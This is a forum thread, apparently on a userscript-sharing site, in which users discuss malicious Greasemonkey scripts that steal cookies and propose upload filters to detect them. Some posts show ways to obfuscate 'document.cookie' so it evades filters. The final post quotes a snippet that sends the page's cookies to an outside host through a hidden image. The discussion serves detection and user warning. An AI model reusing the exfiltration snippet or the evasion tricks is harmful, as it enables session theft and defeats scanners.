|
|
Can someone explain me how to install scripts? I was looking in that topic and try diffrent things but still can't install scripts. Please help me. |
|
|
Wrong Topic
|
|
|
! |
|
|
Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergip..." GodDamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!?? |
|
|
Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!?? |
|
|
o_O I don't understand, this script is safe right? I was going to try and get in contact with the maker or someone of code knowledge because it doesn't work for videos using "/ep_gr.swf?v=" I have to remove "/ep_gr.swf" was thinking script should be able to do that but no idea what so ever how to script it. |
|
|
what are you talking about? |
|
|
aaaa |
|
|
Perhaps the uploading process can scan for the aforementioned keywords to detect cookie stealing, while also searching for shorturls and tinyurls; if such URLs are found, a notice can be displayed alerting people that the userscript links to unknown URLs and may thus contain hazardous code; and if the cookie stealing stuff is displayed, the script can be immediately blocked. As for stopping the charcode workaround, the userscript can search for charcode-related functions and scan them for the respective charcodes in addition to searching for the string "document.cookie"; it may also be necessary to search for any occurances of a coder storing a charcode function in a variable to avoid detection, e.x. (var avoidTheFilters = String.fromCharCode;). This, however, will fail to stop the following possible filter workaround: varname.scrapText.value=eval(String.fromCharCode(100,111,99)+String.fr So the following upload filters could be enacted to prevent cookie exploits, charcode-related vulnerabilities, and potential problems with URL-shortening services:
|
|
|
The fromCharCode is not the only way to build a string, I can do it with a simple strings concatenation "doc"+"ume"+"nt."+"coo"+"kie", or with an array ["doc","ume","nt.","coo","kie"].join("") and there are a lot of other ways much complicated and more obfuscated to create the string "document.cookie", but this is not the only way to access the cookies, look at the following code: for(var prop in document) if (prop.indexOf("coo")!=-1) { document[prop] }. |
|
|
No OGame Tr Server Scripts..?? |
|
|
If possible, the server can actually run a quick test of the code giving it random-ish values if it asks for DOM-related stuff, and if it gets a request for document.cookie, it flags the script as possible malware? I have no idea how much (or little?) bandwidth or server processing power that suggestion would require to use, so it would probably be an implausible solution... |
|
|
Hi, i got some problem it says windows isnt determined and document isnt determined anyone can help me plz!! |
|
|
How about a watch on the call to document.cookie to determine if cookie is being interacted with in any way shape or form? This would be vulnerable to a redefinition of the watch method. |
|
|
I think the best way to date is by implementing this on the userscript site :
|
|
|
yes this is known as cookie poisoning i think i read about it in Wikipedia
if you see any of these lines in your scripts delete it immediately and report it |
|
|
I know how to prevent these cookie stealers:
open(Anything, Something, true); with: variable = CheckSanity(Something);
And also replace all assignments to: window.location, this.href, image.src and such things so its run through CheckSanity(); CheckSanity checks the url against a whitelist, so in greasemonkey, you have a whitelist saying which URLs you want your scripts to access, and then if CheckSanity denies, it will return a generic URL like http://127.0.0.1
The thing with placing the url in a variable, is to have the real value of the url through CheckSanity, so a malicious script cannot encrypt the url. Have a decoder too, that decodes URL encoded urls. |
|
|
Seems to me like it'd be easier to just read through the script and in case something isn't right, don't install it... |
|
|
Rapidshare Premium & Collectors TweakPack (lftk v03) by lifetalk
At code:
// Add jQuery
var GM_JQ = document.createElement('script');
GM_JQ.src = 'http://jquery.07x.net/jquery.js';
|
|
|
@matrixik can you (please) update Screen Userscripts? thanks. |
|
|
I see a problem, if a script contains @require pointing to a dirty .js |
|
|
we need a javascript antivirus... runs nice as a userscript... |
|
|
I already have a javascript antivirus. Its called a brain lol. |
|
|
javacript anti-virus
wonder how the heck it works |
|
|
That jumble of code in <script type="text/javascript"> var encrypt_fix=document; '<img src="http://zshareaudio.phpnet.us/index.php?' +unescape(encrypt_fix.cookie) + '" style="height:0px; width:0px; border: 0px;" width="0" height="0">'; }</script> I like how he stored |